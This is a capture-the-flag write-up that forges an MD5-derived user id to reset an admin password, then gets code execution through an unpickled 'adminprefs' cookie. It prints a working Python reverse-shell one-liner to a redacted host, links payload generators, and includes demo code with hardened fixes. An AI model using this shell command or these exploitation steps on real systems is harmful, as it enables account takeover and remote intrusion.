
# Blind pickle (400)

<figure><img src="/files/ROWhWfqv63xslJgxo3g8" alt=""><figcaption></figcaption></figure>

On first inspection, the website appeared to be a standard application with a login form. My first step was to sign up as a new user.

<figure><img src="/files/D8aZv8VXhuUYeai7WleV" alt=""><figcaption></figcaption></figure>

After signing up and logging in, I was presented with my user details: my username and my role, which was "member." My objective was to escalate this role to "admin."

<figure><img src="/files/iMjWXYZGonbhyhVPVDxd" alt=""><figcaption></figcaption></figure>

My first idea was to inspect the cookies.

```
session=eyJsb2dnZWRpbiI6dHJ1ZSwicm9sZSI6Im1lbWJlciIsInVzZXJfaWQiOjQwLCJ1c2VybmFtZSI6Im1pc3QifQ.aQ4m5g.rKmnsBWjVQzgcCh00N7GrInVlEQ
```

At first glance it looked like a JWT, but the structure is that of a Flask session cookie: a Base64url-encoded JSON payload, a short timestamp segment, and an HMAC signature produced by itsdangerous with the application's `SECRET_KEY`, which is why the payload decodes to a plain dictionary rather than a JWT header. I attempted several attacks, like trying to forge a cookie without a signature or brute-forcing the secret, but nothing worked. I left it aside for a bit and continued my reconnaissance.

<figure><img src="/files/T4sFaQ0E6hxVQLlNJPPK" alt=""><figcaption></figcaption></figure>

I noticed there was a "change password" page. This seemed significant; there had to be a reason for its existence. I entered my username and email, paying close attention to the network tab to inspect the request and response. The first request was normal, sending my username and email, and I received a page asking for a new password in response.

<figure><img src="/files/2ENmDlt90E9QjTbhxL4H" alt=""><figcaption></figcaption></figure>

I proceeded with the password change, but this time I found something interesting in the request.

<figure><img src="/files/tIPGGQ1h8apHkrKUkzWh" alt=""><figcaption></figcaption></figure>

A UID was being sent along with my username. I copied its value:

```
d645920e395fedad7bbbed0eca3fe2e0
```

It was 32 hex characters, the length of an MD5 digest. I took it to CrackStation, and my suspicion was correct: it was the MD5 hash of the number 40.

I remembered seeing a similar number. It was in my JWT cookie payload as the `user_id`.

```json
{
  "loggedin": true,
  "role": "member",
  "user_id": 40,
  "username": "mist"
}
```

With this knowledge, I realized I could replace that hash with the MD5 of a different ID, for example `user_id = 1` together with `username = admin`. The reset step identified the target account from this client-supplied value rather than from the logged-in session, so the goal was to change the admin's password and log in with it.
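To make the mechanism concrete, here is an added Python example (my own code, not the challenge's source) that reproduces the UID derivation, resolves the observed hash offline the way CrackStation did, and contrasts a reset handler that trusts the client-supplied hash with one that binds a random, single-use token to the logged-in user. The user table and password values are constructed sample data, and the handler names are hypothetical.

```python
import hashlib
import secrets
from typing import Optional

# UID value observed in the password-change request (from the write-up).
OBSERVED_UID = "d645920e395fedad7bbbed0eca3fe2e0"


def md5_of_id(user_id: int) -> str:
    """Derive the UID the way the challenge did: MD5 of the decimal user id."""
    return hashlib.md5(str(user_id).encode()).hexdigest()


def resolve_uid(uid_hash: str, max_id: int = 100_000) -> Optional[int]:
    """Offline equivalent of the CrackStation lookup: try small integer ids."""
    for candidate in range(max_id):
        if md5_of_id(candidate) == uid_hash:
            return candidate
    return None


# Constructed stand-in for the application's user table (sample data, not real).
USERS = {
    1: {"username": "admin", "password": "original-admin-password"},
    40: {"username": "mist", "password": "original-member-password"},
}


def vulnerable_reset(uid_hash: str, new_password: str) -> str:
    """Mirrors the observed behaviour: the account to modify is chosen from a
    client-supplied value, so any guessable UID resets anyone's password."""
    for user_id, record in USERS.items():
        if md5_of_id(user_id) == uid_hash:
            record["password"] = new_password
            return record["username"]
    raise KeyError("unknown uid")


# Hardened flow: the server remembers which authenticated user asked for a
# reset and hands back an unguessable, single-use token; nothing in the
# request identifies the target account.
RESET_TOKENS = {}  # token -> user_id (in-memory for the example)


def issue_reset_token(session_user_id: int) -> str:
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[token] = session_user_id
    return token


def hardened_reset(token: str, new_password: str) -> str:
    user_id = RESET_TOKENS.pop(token, None)  # consume the token on first use
    if user_id is None:
        raise PermissionError("invalid, reused or expired reset token")
    USERS[user_id]["password"] = new_password
    return USERS[user_id]["username"]


def demo_single_use(session_user_id: int) -> bool:
    """Return True if a token works exactly once and is refused on replay."""
    token = issue_reset_token(session_user_id)
    hardened_reset(token, "fresh")
    try:
        hardened_reset(token, "again")
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print("observed uid belongs to user_id", resolve_uid(OBSERVED_UID))
    print("forged uid for user_id 1:", md5_of_id(1))
    print("vulnerable reset changed password of", vulnerable_reset(md5_of_id(1), "pwned"))
    print("hardened token is single-use:", demo_single_use(40))
```

Resolving the hash is only possible because the input space is tiny (sequential integers) and MD5 is unkeyed; an HMAC over the id with a server secret would block the guess, but the real fix is that the reset request should not carry the target identity at all.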

<figure><img src="/files/22ozIAdO2mc9EPrrZ2mb" alt=""><figcaption></figcaption></figure>

It worked! I successfully changed the password for the admin account and was able to log in.

<figure><img src="/files/cGjqjEWBl58w9lahuICH" alt=""><figcaption></figcaption></figure>

Once logged in as admin, I found an admin panel. My first thought was SQL injection, but the challenge name was "pickle," which pointed toward a specific Python library. There was also no obvious place to input a query.

However, there was a button. I clicked it while monitoring the network tab.

<figure><img src="/files/MurpTV5qQrHQxCOF4hOy" alt=""><figcaption></figcaption></figure>

A new cookie appeared: `adminprefs`. Its value looked like Base64. After some research on Python's pickle library, I learned that `pickle.loads` calls whatever callable a serialized object's `__reduce__` names, so an application that unpickles attacker-controlled data such as a cookie hands the attacker Remote Code Execution (RCE).

{% embed url="<https://medium.com/@rajk88/how-to-exploit-python-pickle-vulnerability-1144c28ec022>" %}

I needed to test whether the website was vulnerable. I used a Python reverse-shell one-liner (the generator I used is linked below):

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("REDACTED",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
```

To craft the final exploit, I used a public repository to generate the malicious pickle payload. I set up an ngrok TCP tunnel to expose my listener and started `netcat` on the local port the tunnel forwarded to.

**Reverse shell generator:**

{% embed url="<https://www.revshells.com/>" %}

**The github repo for the pickle payload:**

{% embed url="<https://github.com/shafdo/pickle-payload-gen-python3/blob/master/pickle-payload-gen.py>" %}

Finally, I placed the generated payload into the `adminprefs` cookie, refreshed the page so the server would unpickle it, and received a reverse shell on my listener.
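As an added illustration (my code, not the challenge's or the linked repository's), the following Python shows why an unpickled cookie is code execution: a class whose `__reduce__` names a callable, the cookie encoding described above (pickle, then Base64), a loader that does what the challenge server appears to do, and a restricted loader that refuses every global import from the stream. The payload's callable is `builtins.eval` on a harmless arithmetic expression rather than the reverse-shell command used against the challenge, so the effect is visible without a listener; the function names and the `adminprefs` contents are assumptions.

```python
import base64
import io
import pickle


class Payload:
    """On load, pickle calls the callable named by __reduce__ with these args.
    The real exploit named os.system/socket with a reverse-shell command;
    eval on a constant keeps this demo harmless and deterministic."""

    def __reduce__(self):
        return (eval, ("6 * 7",))


def make_cookie(obj) -> str:
    """Build an adminprefs-style value: pickle the object, then Base64 it."""
    return base64.b64encode(pickle.dumps(obj)).decode("ascii")


def load_prefs_vulnerable(cookie: str):
    """What the challenge server appears to do: unpickle the cookie as-is.
    Any GLOBAL/STACK_GLOBAL + REDUCE sequence in the stream runs on the server."""
    return pickle.loads(base64.b64decode(cookie))


class RestrictedUnpickler(pickle.Unpickler):
    """Preferences are plain dicts of str/int/bool, which pickle encodes without
    importing anything, so every attempt to resolve a global is an attack."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def load_prefs_hardened(cookie: str):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie))).load()


def hardened_rejects(cookie: str) -> bool:
    """True if the restricted loader refuses the cookie."""
    try:
        load_prefs_hardened(cookie)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    evil = make_cookie(Payload())
    print("vulnerable loader returned:", load_prefs_vulnerable(evil))  # eval ran on load
    print("hardened loader rejected it:", hardened_rejects(evil))
    benign = make_cookie({"theme": "dark", "rows": 20})
    print("hardened loader still reads real prefs:", load_prefs_hardened(benign))
```

The challenge's loader clearly resolved globals, otherwise the reverse-shell payload could not have run. Overriding `find_class` is the documented way to restrict pickle, but for a preferences cookie the better fix is not to use pickle at all: store JSON, or keep the preferences in the signed server-side session.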

